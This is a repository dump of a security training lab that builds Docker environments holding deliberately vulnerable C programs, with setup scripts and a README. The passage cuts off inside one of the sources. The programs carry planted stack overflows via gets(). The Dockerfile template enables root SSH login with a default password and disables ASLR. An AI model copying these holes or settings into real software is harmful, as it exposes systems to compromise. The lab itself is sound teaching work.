├── ChallengeBuild.py ├── DockerFile.py ├── README.md ├── binaries ├── arm32v7 │ ├── ch00 │ ├── ch01 │ ├── ch02 │ ├── ch03 │ ├── ch04 │ ├── ch05 │ ├── ch06 │ ├── ch07 │ ├── ch08 │ ├── ch09 │ ├── ch10 │ ├── ch11 │ └── ch12 └── i386 │ ├── ch00 │ ├── ch01 │ ├── ch02 │ ├── ch03 │ ├── ch04 │ ├── ch05 │ ├── ch06 │ ├── ch07 │ ├── ch08 │ ├── ch09 │ └── ch10 ├── exercises-arm32v7 ├── banner ├── ch00 │ ├── ch00.c │ ├── compile.sh │ └── flag ├── ch01 │ ├── ch01.c │ ├── compile.sh │ └── flag ├── ch02 │ ├── ch02.c │ ├── compile.sh │ └── flag ├── ch03 │ ├── ch03.c │ ├── compile.sh │ └── flag ├── ch04 │ ├── ch04.c │ ├── compile.sh │ └── flag ├── ch05 │ ├── ch05.c │ ├── compile.sh │ └── flag ├── ch06 │ ├── ch06.c │ ├── compile.sh │ └── flag ├── ch07 │ ├── ch07.c │ ├── compile.sh │ └── flag ├── ch08 │ ├── ch08.c │ ├── compile.sh │ └── flag ├── ch09 │ ├── ch09.c │ ├── compile.sh │ └── flag ├── ch10 │ ├── ch10.c │ ├── compile.sh │ └── flag ├── ch11 │ ├── ch11.c │ ├── compile.sh │ └── flag ├── ch12 │ ├── ch12.c │ ├── compile.sh │ └── flag ├── motd └── welcome │ ├── compile.sh │ ├── flag │ └── welcome.c ├── exercises-i386 ├── banner ├── ch00 │ ├── ch00.c │ ├── compile.sh │ └── flag ├── ch01 │ ├── ch01.c │ ├── compile.sh │ └── flag ├── ch02 │ ├── ch02.c │ ├── compile.sh │ └── flag ├── ch03 │ ├── ch03.c │ ├── compile.sh │ └── flag ├── ch04 │ ├── ch04.c │ ├── compile.sh │ └── flag ├── ch05 │ ├── ch05.c │ ├── compile.sh │ └── flag ├── ch06 │ ├── ch06.c │ ├── compile.sh │ └── flag ├── ch07 │ ├── ch07.c │ ├── compile.sh │ └── flag ├── ch08 │ ├── ch08.c │ ├── compile.sh │ └── flag ├── ch09 │ ├── ch09.c │ ├── compile.sh │ └── flag ├── ch10 │ ├── ch10.c │ ├── compile.sh │ └── flag ├── motd └── welcome │ ├── compile.sh │ ├── flag │ └── welcome.c ├── main.py ├── qemu-arm-static └── writeups ├── arm32v7 ├── ArmExploit.py ├── ArmExploit.pyc ├── ch00 │ ├── ch00 │ ├── ch00.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch01 │ ├── ch01 │ ├── ch01.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch02 │ ├── ch02 │ ├── ch02.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch03 │ ├── ch03 │ ├── ch03.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch04 │ ├── ch04 │ ├── ch04.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch05 │ ├── ch05 │ ├── ch05.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch06 │ ├── ch06 │ ├── ch06.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch07 │ ├── ch07 │ ├── ch07.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch08 │ ├── ch08 │ ├── ch08.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch09 │ ├── ch09 │ ├── ch09.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch10 │ ├── ch10 │ ├── ch10.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch11 │ ├── ch11 │ ├── ch11.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch12 │ ├── ch12 │ ├── ch12.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── debug.sh ├── gdb_plugin.sh ├── remote.sh ├── run.sh └── setup.sh └── i386 ├── I386Exploit.py ├── I386Exploit.pyc ├── ch00 ├── ch00 ├── ch00.c ├── compile.sh ├── exploit.py └── flag ├── ch01 ├── ch01 ├── ch01.c ├── compile.sh ├── exploit.py └── flag ├── ch02 ├── ch02 ├── ch02.c ├── compile.sh ├── exploit.py └── flag ├── ch03 ├── ch03 ├── ch03.c ├── compile.sh ├── exploit.py └── flag ├── ch04 ├── ch04 ├── ch04.c ├── compile.sh ├── exploit.py └── flag ├── ch05 ├── ch05 ├── ch05.c ├── compile.sh ├── exploit.py └── flag ├── ch06 ├── ch06 ├── ch06.c ├── compile.sh ├── exploit.py └── flag ├── ch07 ├── ch07 ├── ch07.c ├── compile.sh ├── exploit.py └── flag ├── ch08 ├── ch08 ├── ch08.c ├── compile.sh ├── exploit.py └── flag ├── ch09 ├── ch09 ├── ch09.c ├── compile.sh ├── exploit.py └── flag ├── ch10 ├── ch10 ├── ch10.c ├── compile.sh ├── exploit.py └── flag ├── gdb_plugin.sh ├── remote.sh └── setup.sh /ChallengeBuild.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | import argparse 4 | import os 5 | 6 | 7 | class ChallengeBuild(object): 8 | def __init__(self, directory, arch, aslr): 9 | """ 10 | Scan and build challanges 11 | :param directory: 12 | :param is_compile: 13 | :param is_move_flags: 14 | """ 15 | if not directory: 16 | directory = os.getcwd() 17 | self.directory = directory 18 | self.sources = [] 19 | self.arch = arch 20 | self.aslr = True if aslr == 'yes' else False 21 | 22 | def __enter__(self): 23 | self.generate() 24 | return self 25 | 26 | def __exit__(self, exc_type, exc_val, exc_tb): 27 | return 28 | 29 | def generate(self): 30 | if self.aslr: 31 | architecture_challenges = "exercises-i386-aslr" if self.arch == 'i386' else 'exercises-arm32v7-aslr' 32 | else: 33 | architecture_challenges = "exercises-i386" if self.arch == 'i386' else 'exercises-arm32v7' 34 | 35 | challenges_folders = [os.path.join(self.directory, architecture_challenges, f) for f in 36 | os.listdir(os.path.join(self.directory, architecture_challenges)) if 37 | os.path.isdir(os.path.join(self.directory, architecture_challenges, f))] 38 | 39 | for challenge in challenges_folders: 40 | potential_challenge = os.path.join(challenge, os.path.basename(challenge)) + '.c' 41 | if os.path.isfile(potential_challenge): 42 | self.sources.append((os.path.basename(potential_challenge))) 43 | 44 | 45 | def main(arch, aslr, directory=None): 46 | with ChallengeBuild(directory=directory, arch=arch, aslr=aslr) as handle: 47 | print handle.sources 48 | 49 | 50 | if __name__ == '__main__': 51 | parser = argparse.ArgumentParser(description='Scan directory and prepares Challanges & Flags') 52 | parser.add_argument('-d', '--directory', help='main directory', required=False, dest='directory') 53 | parser.add_argument('-a', '--architecture', help='i386/arm32v7', required=True, dest='arch') 54 | 55 | parser.add_argument('-as', '--aslr', help='yes/no', required=True, dest='aslr') 56 | 57 | main(**vars(parser.parse_args())) 58 | -------------------------------------------------------------------------------- /DockerFile.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | import argparse 4 | import os 5 | 6 | DOCKERFILE_TEMPLATE = """ 7 | 8 | {architecture_dependant} 9 | RUN apt-get update 10 | 11 | WORKDIR / 12 | 13 | RUN apt-get install -y openssh-server 14 | RUN apt-get install -y sudo 15 | RUN apt-get install -y python 16 | RUN apt-get install -y gdb 17 | RUN apt-get install -y git 18 | RUN apt-get install -y vim 19 | RUN apt-get install -y gcc 20 | RUN apt-get install -y strace 21 | 22 | {challenge_template} 23 | 24 | RUN mkdir /var/run/sshd 25 | RUN echo 'root:default' | chpasswd 26 | 27 | RUN sed -i 's/[#]*PermitRootLogin [a-zA-Z\-]*/PermitRootLogin yes/' /etc/ssh/sshd_config 28 | RUN sed -i 's/[#]*UsePrivilegeSeparation [a-zA-Z\-]*/UsePrivilegeSeparation no/' /etc/ssh/sshd_config 29 | RUN sed -i 's/[#]*Banner [a-zA-Z\-\/\.]*/Banner \/etc\/banner/' /etc/ssh/sshd_config 30 | 31 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 32 | RUN echo "export VISIBLE=now" >> /etc/profile 33 | RUN sysctl -w kernel.dmesg_restrict=1 34 | RUN chmod 1733 /tmp /var/tmp /dev/shm 35 | 36 | RUN git clone https://github.com/longld/peda.git /usr/bin/peda 37 | RUN echo "source /usr/bin/peda/peda.py" >> ~/.gdbinit 38 | RUN chmod 0755 /usr/bin/peda/*.py 39 | RUN chmod 0755 /usr/bin/peda/lib/*.py 40 | 41 | RUN sysctl -w kernel.randomize_va_space={aslr} 42 | 43 | 44 | EXPOSE 22 45 | CMD ["/usr/sbin/sshd", "-D"] 46 | """ 47 | 48 | CHALLENGE_TEMPLATE = """ 49 | 50 | COPY {architecture_challenges}/{challenge_name}/* /home/{challenge_name}/ 51 | 52 | RUN adduser {challenge_name} ; adduser {challenge_name}_root ; usermod -G {challenge_name} {challenge_name} ; usermod -G {challenge_name}_root {challenge_name}_root ; /home/{challenge_name}/compile.sh /home/{challenge_name} 53 | 54 | RUN chown {challenge_name}_root /home/{challenge_name}/flag ; chown {challenge_name}_root:{challenge_name} /home/{challenge_name}/{challenge_name} ; chown {challenge_name}:{challenge_name} /home/{challenge_name}/{challenge_name}.c /home/{challenge_name}/compile.sh ; chown root:root /home/{challenge_name}_root 55 | 56 | RUN chmod 0400 /home/{challenge_name}/flag ; chmod 4550 /home/{challenge_name}/{challenge_name} ; chmod 0440 /home/{challenge_name}/{challenge_name}.c /home/{challenge_name}/compile.sh 57 | 58 | RUN echo '{challenge_name}:{challenge_name}' | chpasswd ; echo '{challenge_name}_root:default' | chpasswd ; echo "source /usr/bin/peda/peda.py" > /home/{challenge_name}/.gdbinit 59 | 60 | """ 61 | 62 | 63 | class DockerFile(object): 64 | def __init__(self, sources, docker_name, no_cache, port, build_run, arch, aslr): 65 | """ 66 | Generate dockerfile 67 | :param sources: 68 | :param docker_name: 69 | :param no_cache: 70 | :param port: 71 | :param build_run: 72 | """ 73 | self.sources = sources 74 | self.dockerfile = None 75 | self.docker_name = docker_name 76 | self.no_cache = '--no-cache' if no_cache else '' 77 | self.port = port 78 | self.build_run = build_run 79 | self.arch = arch 80 | self.aslr = True if aslr == 'yes' else False 81 | 82 | def __enter__(self): 83 | self.generate() 84 | return self 85 | 86 | def __exit__(self, exc_type, exc_val, exc_tb): 87 | return 88 | 89 | def _format_template(self): 90 | challenge_template = '' 91 | if self.arch == 'i386': 92 | architecture_challenges = "exercises-i386-aslr" if self.aslr else 'exercises-i386' 93 | architecture_dependant = "FROM i386/ubuntu\nCOPY {arch_c}/banner /etc/banner\nCOPY {arch_c}/motd /etc/motd".format( 94 | arch_c=architecture_challenges) 95 | else: 96 | architecture_challenges = "exercises-arm32v7-aslr" if self.aslr else 'exercises-arm32v7' 97 | architecture_dependant = "FROM armhf/ubuntu\nCOPY qemu-arm-static /usr/bin/\nCOPY {arch_c}/motd /etc/motd\nCOPY {arch_c}/banner /etc/banner".format( 98 | arch_c=architecture_challenges) 99 | 100 | for f in self.sources: 101 | challenge_template += CHALLENGE_TEMPLATE.format(challenge_name=f.split('.c')[0], 102 | architecture_challenges=architecture_challenges) 103 | 104 | dockerfile = DOCKERFILE_TEMPLATE.format(architecture_dependant=architecture_dependant, 105 | challenge_template=challenge_template, 106 | aslr='2' if self.aslr else '0') 107 | 108 | self.dockerfile = dockerfile 109 | 110 | def _docker_build_run(self): 111 | interactive = raw_input( 112 | 'execute `sudo docker stop $(sudo docker ps -a -q) ; sudo docker rm $(sudo docker ps -a -q)` y/n?') 113 | if interactive == 'y': 114 | os.system('sudo docker stop $(sudo docker ps -a -q) ; sudo docker rm $(sudo docker ps -a -q)') 115 | os.system('sudo docker build {no_cache} -t {docker_name} .'.format(no_cache=self.no_cache, 116 | docker_name=self.docker_name)) 117 | os.system( 118 | 'sudo docker run --privileged --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d -p {port}:22 --name {docker_name} {docker_name}'.format( 119 | port=self.port, docker_name=self.docker_name)) 120 | 121 | def generate(self): 122 | self._format_template() 123 | with open('Dockerfile', 'w') as f: 124 | f.write(self.dockerfile) 125 | 126 | if self.build_run: 127 | self._docker_build_run() 128 | 129 | 130 | def main(port, arch, sources, docker_name, aslr, no_cache=True, build_run=False): 131 | with DockerFile(sources=sources, docker_name=docker_name, port=port, no_cache=no_cache, 132 | build_run=build_run, arch=arch, aslr=aslr) as handle: 133 | print handle.sources 134 | 135 | 136 | if __name__ == '__main__': 137 | parser = argparse.ArgumentParser(description='Scan directory and prepares challenges & Flags') 138 | parser.add_argument('-s', '--sources', help='challenges sources names', required=True, dest='sources') 139 | parser.add_argument('-d', '--docker-name', help='docker name', required=True, dest='docker_name') 140 | parser.add_argument('-ca', '--no-cache', help='use cache when building docker', required=False, dest='no_cache', 141 | action='store_false') 142 | parser.add_argument('-r', '--build-run', help='build and run docker', required=False, dest='build_run', 143 | action='store_true') 144 | parser.add_argument('-p', '--port', help='running docker port', required=True, dest='port') 145 | 146 | parser.add_argument('-a', '--architecture', help='i386/arm32v7', required=True, dest='arch') 147 | parser.add_argument('-as', '--aslr', help='yes/no', required=True, dest='aslr') 148 | 149 | main(**vars(parser.parse_args())) 150 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ZenySec-Exploit-Exercises 2 | Exploit Exercises for Security Researchers 3 | 4 | Infrastructure to create multi architecture environments with a collection of vulnerable binaries 5 | 6 | ## Website 7 | [zenysec.com](https://zenysec.com) 8 | 9 | ## Architectures 10 | 11 | ### Armv7 (32bit) 12 | [e.zenysec.com](http://e.zenysec.com) 13 | 14 | `ch00` - Stack Buffer Overflow 15 | 16 | `ch01` - Stack Buffer Overflow 17 | 18 | `ch02` - Stack Buffer Overflow 19 | 20 | `ch03` - Return Oriented Programming 21 | 22 | `ch04` - Buffer Overflow 23 | 24 | `ch05` - Format String 25 | 26 | `ch06` - Shellcode 27 | 28 | `ch07` - Return Oriented Programming 29 | 30 | `ch08` - Return Oriented Programming 31 | 32 | `ch09` - Return Oriented Programming 33 | 34 | `ch10` - Shellcode 35 | 36 | `ch11` - Heap Buffer Overflow 37 | 38 | `ch12` - Use After Free 39 | 40 | ### Intel i386 (32bit) 41 | [e.zenysec.com](http://e.zenysec.com/) 42 | 43 | `ch00` - Stack Buffer Overflow 44 | 45 | `ch01` - Stack Buffer Overflow 46 | 47 | `ch02` - Stack Buffer Overflow 48 | 49 | `ch03` - Return Oriented Programming 50 | 51 | `ch04` - Buffer Overflow 52 | 53 | `ch05` - Format String 54 | 55 | `ch06` - Shellcode 56 | 57 | `ch07` - Return Oriented Programming 58 | 59 | `ch08` - Shellcode 60 | 61 | `ch09` - Heap Buffer Overflow 62 | 63 | `ch10` - Use After Free 64 | 65 | ### Prerequisites 66 | 67 | ``` 68 | Python 2.7 69 | Docker 70 | ``` 71 | 72 | ## Getting Started 73 | 74 | Example to generate i386 environment with ssh service on port 20000 75 | ``` 76 | git clone https://github.com/eLoopWoo/zenysec-exploit-exercises 77 | cd zenysec-exploit-exercises 78 | python main.py -d exercises-i386 -ca -r -p 20000 -a i386 -as no 79 | ``` 80 | 81 | Example to generate arm32v7 environment with ssh service on port 20000 82 | ``` 83 | git clone https://github.com/eLoopWoo/zenysec-exploit-exercises 84 | cd zenysec-exploit-exercises 85 | python main.py -d exercises-arm32v7 -ca -r -p 20000 -a arm32v7 -as no 86 | ``` 87 | 88 | The goal is to login via a basic user "exercise" and escalate privileges to a second user "exercise_root" and read the contents of a protected "flag" file. ( challenge name, user and password are equal in basic users ) 89 | 90 | Example for exercise ch00 91 | ``` 92 | user: ch00 93 | password: ch00 94 | 95 | user: ch00_root 96 | password: default (unknown) 97 | ``` 98 | 99 | Compiled binaries located under "binaries" directory 100 | 101 | Sources located under "exercises-architecture" directory (architecture dependant) 102 | 103 | ## Todo's 104 | * Add more exercises ( integer, timing, heap corruption... ) 105 | * Add exercises with different malloc implementations ( glibc, jemalloc... ) 106 | * Add more architectures ( mips, risc-v, amd64... ) 107 | 108 | ## Help & Guidance 109 | 110 | Create issues with the specific problem. 111 | Any further questions or requests Tweet me [@tomereyz](https://twitter.com/tomereyz) 112 | 113 | ## Authors 114 | 115 | * **Tomer Eyzenberg** - *Initial work* - [eLoopWoo](https://github.com/eLoopWoo) 116 | 117 | -------------------------------------------------------------------------------- /binaries/arm32v7/ch00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch00 -------------------------------------------------------------------------------- /binaries/arm32v7/ch01: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch01 -------------------------------------------------------------------------------- /binaries/arm32v7/ch02: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch02 -------------------------------------------------------------------------------- /binaries/arm32v7/ch03: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch03 -------------------------------------------------------------------------------- /binaries/arm32v7/ch04: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch04 -------------------------------------------------------------------------------- /binaries/arm32v7/ch05: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch05 -------------------------------------------------------------------------------- /binaries/arm32v7/ch06: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch06 -------------------------------------------------------------------------------- /binaries/arm32v7/ch07: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch07 -------------------------------------------------------------------------------- /binaries/arm32v7/ch08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch08 -------------------------------------------------------------------------------- /binaries/arm32v7/ch09: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch09 -------------------------------------------------------------------------------- /binaries/arm32v7/ch10: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch10 -------------------------------------------------------------------------------- /binaries/arm32v7/ch11: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch11 -------------------------------------------------------------------------------- /binaries/arm32v7/ch12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch12 -------------------------------------------------------------------------------- /binaries/i386/ch00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch00 -------------------------------------------------------------------------------- /binaries/i386/ch01: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch01 -------------------------------------------------------------------------------- /binaries/i386/ch02: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch02 -------------------------------------------------------------------------------- /binaries/i386/ch03: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch03 -------------------------------------------------------------------------------- /binaries/i386/ch04: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch04 -------------------------------------------------------------------------------- /binaries/i386/ch05: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch05 -------------------------------------------------------------------------------- /binaries/i386/ch06: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch06 -------------------------------------------------------------------------------- /binaries/i386/ch07: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch07 -------------------------------------------------------------------------------- /binaries/i386/ch08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch08 -------------------------------------------------------------------------------- /binaries/i386/ch09: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch09 -------------------------------------------------------------------------------- /binaries/i386/ch10: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch10 -------------------------------------------------------------------------------- /exercises-arm32v7/banner: -------------------------------------------------------------------------------- 1 | 2 | ███████╗███████╗███╗ ██╗██╗ ██╗███████╗███████╗ ██████╗ 3 | ╚══███╔╝██╔════╝████╗ ██║╚██╗ ██╔╝██╔════╝██╔════╝██╔════╝ 4 | ███╔╝ █████╗ ██╔██╗ ██║ ╚████╔╝ ███████╗█████╗ ██║ 5 | ███╔╝ ██╔══╝ ██║╚██╗██║ ╚██╔╝ ╚════██║██╔══╝ ██║ 6 | ███████╗███████╗██║ ╚████║ ██║ ███████║███████╗╚██████╗ 7 | ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═════╝ 8 | 9 | █████╗ ██████╗ ███╗ ███╗██████╗ ██████╗ ██╗ ██╗███████╗ 10 | ██╔══██╗██╔══██╗████╗ ████║╚════██╗╚════██╗██║ ██║╚════██║ 11 | ███████║██████╔╝██╔████╔██║ █████╔╝ █████╔╝██║ ██║ ██╔╝ 12 | ██╔══██║██╔══██╗██║╚██╔╝██║ ╚═══██╗██╔═══╝ ╚██╗ ██╔╝ ██╔╝ 13 | ██║ ██║██║ ██║██║ ╚═╝ ██║██████╔╝███████╗ ╚████╔╝ ██║ 14 | ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚══════╝ ╚═══╝ ╚═╝ 15 | 16 | ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ 17 | ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ 18 | █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ███████║ ██║ ██║██║ ██║██╔██╗ ██║ 19 | ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ 20 | ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ 21 | ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ 22 | 23 | ███████╗██╗ ██╗███████╗██████╗ ██████╗██╗███████╗███████╗███████╗ 24 | ██╔════╝╚██╗██╔╝██╔════╝██╔══██╗██╔════╝██║██╔════╝██╔════╝██╔════╝ 25 | █████╗ ╚███╔╝ █████╗ ██████╔╝██║ ██║███████╗█████╗ ███████╗ 26 | ██╔══╝ ██╔██╗ ██╔══╝ ██╔══██╗██║ ██║╚════██║██╔══╝ ╚════██║ 27 | ███████╗██╔╝ ██╗███████╗██║ ██║╚██████╗██║███████║███████╗███████║ 28 | ╚══════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝╚══════╝╚══════╝╚══════╝ 29 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch00/ch00.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | char value; 17 | }; 18 | struct locals l = {.value = 0, .content = {0}, .name = {0}}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | if(l.value == 0x7){ 28 | secret(); 29 | } 30 | } 31 | 32 | int menu(){ 33 | char buffer[BUF_SIZE] = {0}; 34 | 35 | printf("[*] menu\n"); 36 | printf("menu - show this menu\n"); 37 | printf("send - send new message\n"); 38 | printf("exit - close program\n"); 39 | 40 | fgets(buffer, BUF_SIZE, stdin); 41 | 42 | if (strcmp(buffer, "menu\n") == 0){ 43 | return 1; 44 | } 45 | else if (strcmp(buffer, "send\n") == 0){ 46 | send(); 47 | return 1; 48 | } 49 | else if (strcmp(buffer, "exit\n") == 0){ 50 | return 0; 51 | } 52 | else{ 53 | printf("Unknown command: %s", buffer); 54 | return 1; 55 | } 56 | 57 | } 58 | 59 | int main(int argc, char **argv){ 60 | setbuf(stdout, NULL); 61 | uid_t uid = geteuid(); 62 | setresuid(uid,uid,uid); 63 | printf("Welcome to ch00!\n"); 64 | while(1){ 65 | if (!(menu())){ 66 | break; 67 | } 68 | printf("\n"); 69 | } 70 | printf("Exiting...\n"); 71 | } 72 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch00/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch00.c -static -no-pie -o $1/ch00 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch00/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch01/ch01.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | char admin[BUF_SIZE]; 17 | }; 18 | struct locals l = {.name = {0}, .content = {0}, .admin = "false"}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | if(!(strcmp(l.admin, "true"))){ 28 | secret(); 29 | } 30 | } 31 | 32 | int menu(){ 33 | char buffer[BUF_SIZE] = {0}; 34 | 35 | printf("[*] menu\n"); 36 | printf("menu - show this menu\n"); 37 | printf("send - send new message\n"); 38 | printf("exit - close program\n"); 39 | 40 | fgets(buffer, BUF_SIZE, stdin); 41 | 42 | if (strcmp(buffer, "menu\n") == 0){ 43 | return 1; 44 | } 45 | else if (strcmp(buffer, "send\n") == 0){ 46 | send(); 47 | return 1; 48 | } 49 | else if (strcmp(buffer, "exit\n") == 0){ 50 | return 0; 51 | } 52 | else{ 53 | printf("Unknown command: %s", buffer); 54 | return 1; 55 | } 56 | 57 | } 58 | 59 | int main(int argc, char **argv){ 60 | setbuf(stdout, NULL); 61 | uid_t uid = geteuid(); 62 | setresuid(uid,uid,uid); 63 | printf("Welcome to ch01!\n"); 64 | while(1){ 65 | if (!(menu())){ 66 | break; 67 | } 68 | printf("\n"); 69 | } 70 | printf("Exiting...\n"); 71 | } 72 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch01/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch01.c -static -no-pie -o $1/ch01 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch01/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch02/ch02.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | void (*hook)(); 17 | }; 18 | struct locals l = {.name = {0}, .content = {0}, .hook = 0}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: 